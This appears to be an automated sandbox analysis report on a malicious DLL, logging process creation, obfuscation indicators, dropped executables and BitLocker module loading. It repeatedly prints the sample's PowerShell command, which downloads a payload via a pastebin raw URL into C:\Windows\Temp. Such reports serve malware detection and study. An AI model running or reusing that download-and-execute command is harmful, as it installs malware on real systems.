Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SystemCoreHelper.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SystemCoreHelper.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: %%.pdb source: mxtvcgq32fe.exe, 0000001E.00000002.2217512599.000000000098A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: $dq7C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.pdb source: rundll32.exe, 0000000A.00000002.2603536788.0000000005031000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: zbjnkzvo4cc.exe, 00000018.00000002.2243599041.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: zbjnkzvo4cc.exe, 00000018.00000002.2243599041.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: $dq7C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.pdb source: rundll32.exe, 00000003.00000002.2634374806.00000000048E1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: zbjnkzvo4cc.exe, 00000018.00000002.2242896029.00000000008FA000.00000004.00000010.00020000.00000000.sdmp, mxtvcgq32fe.exe, 0000001E.00000002.2217512599.000000000098A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Temp\mxtvcgq32fe.PDB source: mxtvcgq32fe.exe, 0000001E.00000002.2217512599.000000000098A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: zbjnkzvo4cc.exe, 00000018.00000002.2243599041.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp, mxtvcgq32fe.exe, 0000001E.00000002.2217869048.0000000000CEC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbKBQ source: mxtvcgq32fe.exe, 0000001E.00000002.2217869048.0000000000CEC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbTAK source: mxtvcgq32fe.exe, 0000001E.00000002.2217869048.0000000000CEC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Temp\zbjnkzvo4cc.PDB source: zbjnkzvo4cc.exe, 00000018.00000002.2242896029.00000000008FA000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\mxtvcgq32fe.exe')"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\mxtvcgq32fe.exe')"	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.cmdline"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.cmdline"	Jump to behavior

Source: zbjnkzvo4cc.exe.17.dr	Static PE information: section name: m@ka
Source: zbjnkzvo4cc.exe.17.dr	Static PE information: section name:
Source: mxtvcgq32fe.exe.19.dr	Static PE information: section name: m@ka
Source: mxtvcgq32fe.exe.19.dr	Static PE information: section name:

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_036E6338 push eax; ret	8_2_036E6341
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_07D24EF3 push FFFFFF8Bh; retf	8_2_07D24EFC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_07D22EA2 push FFFFFF8Bh; iretd	8_2_07D22EAB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_07D22E69 push FFFFFF8Bh; iretd	8_2_07D22E72
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_07D23D64 push FFFFFF8Bh; iretd	8_2_07D23D6D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_07D214E4 push FFFFFF8Bh; iretd	8_2_07D214EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_04BE336A pushfd ; retf	17_2_04BE3379
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_04BE3350 pushad ; retf	17_2_04BE3369
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_0084338B pushfd ; retf	19_2_00843399
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C23EF8 pushfd ; iretd	24_2_68C23EFB
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	Code function: 24_2_68C2033B pushfd ; iretd	24_2_68C20346
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_3_0297FAB1 push eax; ret	26_3_0297FABA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_3_0297FAB1 push eax; ret	26_3_0297FABA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_3_0297F4A4 push 4402954Ah; retf	26_3_0297F4A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_3_0297F4A4 push 4402954Ah; retf	26_3_0297F4A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_3_0297F259 push ecx; iretd	26_3_0297F25A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_3_0297F259 push ecx; iretd	26_3_0297F25A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_3_0297FAB1 push eax; ret	26_3_0297FABA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_3_0297FAB1 push eax; ret	26_3_0297FABA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_3_0297F4A4 push 4402954Ah; retf	26_3_0297F4A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_3_0297F4A4 push 4402954Ah; retf	26_3_0297F4A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_3_0297F259 push ecx; iretd	26_3_0297F25A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 26_3_0297F259 push ecx; iretd	26_3_0297F25A
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_005474E2 push esi; iretd	30_2_005474E6
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_02817E40 push FFFFFFD9h; iretd	30_2_02817E44
Source: C:\Windows\Temp\mxtvcgq32fe.exe	Code function: 30_2_02813B61 push esp; retf	30_2_02813B66
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_05272CE9 push 04B807E0h; retf	34_2_05272CEE

Source: zbjnkzvo4cc.exe.17.dr	Static PE information: section name: m@ka entropy: 7.999658471887131
Source: mxtvcgq32fe.exe.19.dr	Static PE information: section name: m@ka entropy: 7.999658471887131

Source: SystemCoreHelper.dll, JQAlCrJUDBBaZfiZASnKxQXAXPFvBTlZdUcCeDph.cs	High entropy of concatenated method names: 'kGcyCeKiODUqjjRSTanNLotKqCXecFUXCgzROyYT', 'zentMejlYv', 'PakToJqiXh', 'zANOrTWmfE', 'VZrlZtTOUI', 'PKqEXdmSdK', 'RXGxLZrycT', 'hWgtzQJZTU', 'PBnpsPjiRn', 'GeiuNXsTza'
Source: SystemCoreHelper.dll, FUGvnZDwPzUYomQWRJQLQqZSxzmgVfKWWXFiLdEc.cs	High entropy of concatenated method names: 'RLFUTqsHRiaMmOUoVNXNMxBJOXbqHHkOeOUfLfYg', 'EuYsUMQMZBCdYNzbFaCXescspyzJtvrWqenVmVsb', 'QowybiSLNSGpUNOwTITAyiZySDMWBwmuQSifhEjK', 'ogviFJNxZO', 'RsMEqRESZu', 'InAwwXOcuQ', 'sXZUIrQuul', 'TOigMDpLqu', 'NPVHlbGYLH', 'UKdjwTsSVZ'
Source: SystemCoreHelper.dll, fxGXYVQTdjJepCvWmrhZgFfiJXNdKaeubtHoHvLv.cs	High entropy of concatenated method names: 'fedkiegQTb', 'bBEnarvOOO', 'OftqUNNPls', 'bGTSquOQWP', 'weLbSBHDwD', 'SfREmZKMqu', 'rrFAZvHMXG', 'DFRZrKusys', 'fktIAWOpFq', 'JbzCyfylbx'

Persistence and Installation Behavior

Tries to download and execute files (via powershell)

Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\mxtvcgq32fe.exe')"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\mxtvcgq32fe.exe')"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\mxtvcgq32fe.exe	Jump to dropped file
Source: C:\Windows\Temp\zbjnkzvo4cc.exe	File created: C:\Users\user\AppData\Roaming\gdi32.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\zbjnkzvo4cc.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\mxtvcgq32fe.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\zbjnkzvo4cc.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
